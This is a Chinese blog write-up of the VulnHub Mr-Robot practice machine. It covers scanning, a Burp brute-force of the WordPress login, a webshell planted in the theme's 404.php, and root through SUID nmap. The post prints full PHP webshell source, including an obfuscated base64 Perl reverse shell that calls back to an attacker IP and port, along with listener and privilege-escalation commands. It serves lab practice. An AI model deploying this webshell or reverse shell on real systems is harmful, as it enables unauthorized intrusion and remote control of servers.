靶场练习第七天~vulnhub靶场之mrRobot

最新推荐文章于 2024-05-11 11:36:26 发布
最新推荐文章于 2024-05-11 11:36:26 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: # 靶机练习 文章标签: 安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57976347/article/details/122732173
版权

靶机下载链接: 百度网盘 请输入提取码 提取码: sqv3

一、主机发现

1.用ifconfig查看kali的ip,因为kali和靶机都开启了NAT模式,使用namp -sP 192.168.101.0/24探测靶机ip

二、信息收集

1.使用nmap扫描靶机

使用nmap -A 192.168.101.108 ,查看靶机开放的端口与服务。

2.使用dirb命令扫描靶机网站

用dirb命令扫描靶机网站,看看有没有隐藏的网址或者配置文件,具体使用方法:dirb http://192.168.101.108

三、利用找到的信息,进行渗透

1.利用找到的网站寻找有用的信息

(1)扫描到一下可能有用的网站,先看http://192.168.101.108/robots这个网站,一般这里会写哪些文件能不能爬虫

一个txt文件,直接访问这个txt文件,发现了第一个flag

2.字典爆破

访问http://192.168.101.108/robots另外一个文件fsocity.dic

打开刚才的文件发现是一个类似字典的文件将获取到的字典排序

刚才收集的网址里面有个http://192.168.101.108/wp-login.php,可能会用上字典

设置好火狐浏览器的Foxyproxy插件,自动启用

启用kali的brup suite抓包工具,具体操作如下:

抓包工具设置完成后,在用户密码那里随便写点东西

自动弹出,如下所示页面,则抓到包了。

点击右键将数据包发送给 intruder

选择cluster bomb模式,添加用户和密码两个参数

将刚才排序好的字典导入两个参数中

字典添加完成后,点击start attack,开始跑字典,由于字典较长需要跑久一点看到

一个length数值不一样的就是正确的用户密码

接着尝试用爆破出来的用户密码登录一下该网站,结果成功登录到后台

3.利用wp-admin网站后台上传webshell

(1)修改404.php将webshell.php上传

找到404.php,将webshell.php源码粘贴到里面

webshell源码

<?php

function which($pr) {

$path = execute("which $pr");

return ($path ? $path : $pr);

}

function execute($cfe) {

$res = '';

if ($cfe) {

if(function_exists('exec')) {

@exec($cfe,$res);

$res = join("\n",$res);

} elseif(function_exists('shell_exec')) {

$res = @shell_exec($cfe);

} elseif(function_exists('system')) {

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(function_exists('passthru')) {

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(@is_resource($f = @popen($cfe,"r"))) {

$res = '';

while(!@feof($f)) {

$res .= @fread($f,1024);

}

@pclose($f);

}

}

return $res;

}

function cf($fname,$text){

if($fp=@fopen($fname,'w')) {

@fputs($fp,@base64_decode($text));

@fclose($fp);

}

}

$yourip = "192.168.101.10";

$yourport = '4444';

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

之后,先开启监听:nc -lvvp 4444 ,直接访问404.php

访问之后,反向链接到kali

4.渗透

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

(1)查看/home目录有没有flag

发现一个txt文件但是没有robot的密码,在robot目录里面还有一个pasword开头的文件还是md5加密的

解密该字符串

查看刚才的那个key文件,发现flag

(2)SUID提权

1.查看具有的SUID的二进制可执行文件:find / -user root -perm -4000 -print 2>/dev/null

2.已知的可用来提权的linux可行性文件列表如下:nmap、vim、find、bash、more、less、nano、cp

3.进入nmap交互模式,(仅限2.02-5.21版本):nmap --interactive

4.提权root:! sh

汉南帝
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mrRobot.ova
07-16
SHA256: 1B69E9D8139D27387ED0EED112146FA6277272D1622A789E3CFEFBC456ABFA4F
MrRobot-Logo-Project:重新创建和收集“ Mr Robot”电视节目的虚构徽标作为矢量文件的项目
03-06
机器人先生徽标项目 正在进行的工作-随时贡献自己的力量! 重新创建和收集“ Mr Robot”电视节目的虚构徽标作为矢量文件的项目 徽标: 免责声明 这是一个由粉丝制作的项目,与任何正式的机器人先生电视节目或美国...
vulnhub靶场渗透mrrobot漏洞复现
qq_61702710的博客
07-27 742
此 VM 有三个密钥隐藏在不同的位置。你的目标是找到所有三个。每个钥匙都越来越难找到。 VM 并不太困难。没有任何高级利用或逆向工程。该级别被认为是初级 - 中级。
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2692
DC-2靶机渗透测试思路及流程
最全看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1,2024年最新软件测试开发应该了解的Binder原理
最新发布
2401_84563933的博客
05-11 343
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)
driftingblues3-靶机
薛定谔嘚喵博客
04-21 111
信息收集,端口日常开放22、80端口,隐藏目录dirsearch测试一波。多层隐藏目录一层扣一层,最后还查看源代码发现了base64密码串。通过base64密码串解密得到了一个SSH日志信息记录,使用异常的ssh登陆(将用户名改为一句话木马,实现RCE),并通过nc反弹shell。反弹shell成功后,在home下发现新用户一定要进去看一看,发现了.ssh文件SSH公钥私钥免密登陆(又是新知识)。最后常规SUID搜索发现一个getinfo命令集合了系统命令。
mrRobot-1靶场_wp
shajianlong666的博客
06-12 319
简单的一次靶场练习
tryhackme靶场: Mr Robot CTF
m0_64348326的博客
06-20 237
6.再来爆破出密码,这里字典太长且有很多数据重复,直接查看这部分的结果,在第八万多条的。8.根据选项面版RCE描述的方法,主题编辑器右侧找到404页面,添加。搭建的博客站登陆页面,根据登陆时的报错回显,利用下载的字典和。按照最新版的burp社区版爆破速度,估计要爆破到靶机结束。解密,但是还是得付费。需要收费,只能手动搜索了。,由于Linux系统的问题后面不需要再加。工具配合默认字典进行目录扫描,结果中的。7.进入后台后,准备查找历史漏洞,但是。命令,发现要输入密码,读取目录下的。命令开出bash命令窗。
渗透入门Mr-robott靶机练习.doc
07-09
一款入门级别靶机Mr-robot练习思路
MrRobot:您可能在计算机上拥有的最愚蠢的程序
05-03
警告:运行该程序很危险。...python MrRobot.py [--OPTIONS] input_directory python MrRobot.py [--OPTIONS] input_file OPTIONS: -h --help : Displays this message. -v --verbose : Enables verbose mode.
Radmin 3.5 Remote Control Software [MrRobot].rar_radmin_radmin 3
07-14
activator for radmin server 3.0
linux安全加固.rar
08-24
linux安全加固linux安全加固linux安全加固linux安全加固
【甄选靶场Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)
人间体佐菲的博客
09-24 850
Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)信息安全,网络安全,渗透测试
CTFshow——信息收集1-10
lee_maple的博客
01-15 5540
Web1 鼠标右键查看源码,即可看到flag Web2 找到开发者选项,看网页源码,即可获得flag Web3 使用burp对该页面抓包,即可获得flag Web4 首先了解robots协议: robots协议: robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统自带的Notepad,就可以创建和编辑它 。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。
【渗透测试】SolidState靶机渗透练习_rbash逃逸+4555端口james服务漏洞
serendipity1130的博客
09-03 699
一、信息收集: arp-scan -l nmap -sS -sV -T5 -p- 192.168.225.190 dirb http://192.168.225.190 //无有效目录 2.根据端口扫描信息,可以看到开放了邮件接收pop3服务,4555端口开放的是james-admin服务,进行远程查看: telnet 192.168.225.190 4555 //使用root root密码进行登录 help //查看指令 listusers //列用户名 setpassword mindy
Vulnhub靶机Wakanda渗透测试攻略
大方子
11-18 4605
百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导入Wakanda_1.ova靶机环境,修改其网络连接方式为Bridged(桥接网卡),并选择一个可用于联网的网卡(例如,我使用的无线网卡上网,在图中网卡为Inter(R) Dual Band Wireless-...
Mr.Robot靶机 - 机器人先生
Ms08067安全实验室
03-02 2178
本文作者:恩格尔-src小组﹀﹀﹀靶机简介:靶机主题来自美剧《黑客军团》,这是一部传达极客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑风格,这部剧的主角Eliot患有精神分裂,整部剧的...
适合新手的CTF靶场合集
热门推荐
zhy的博客
04-23 3万+
前言 我整理得没有那么全,这里的合集主要还是面对新手。做题贵精不在多,好好练习每一题,学习每个知识点,不懂的百度或者 Google 即可。记住,你是为了提高自己而去打 CTF 。 CTF 比赛时间表 CTFwiki(入门必看wiki): https://ctf-wiki.github.io/ctf-wiki/#/introduction XCTF社区: https://time.xctf....
vulnhub靶场,MR-ROBOT: 1
kukudeshuo的博客
12-16 769
vulnhub靶场,MR-ROBOT: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 攻击机:kali(192.168.109.128) 靶机:MR-ROBOT: 1(192.168.109.190) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:需要获取目标靶机的三个flag 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开
Mrrobot靶机渗透实战-vuluhub系列(六)
PANDA墨森的博客
07-04 585
这是vulnhub靶机系列文章的第六篇,本次主要知识点为:wordpress后台编辑模板getshell,suid提权-nmap命令,话不多说,直接开始吧... 靶机下载地址: https://www.vulnhub.com/entry/mr-robot-1,151/ #001 实验环境(nat模式) 攻击机:kali:192.168.136.129 靶机mrrobot:192.168.136.138 #002 实战writeup 寻找靶机ip,查找网卡中存活的主机,找到靶机ip:19...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值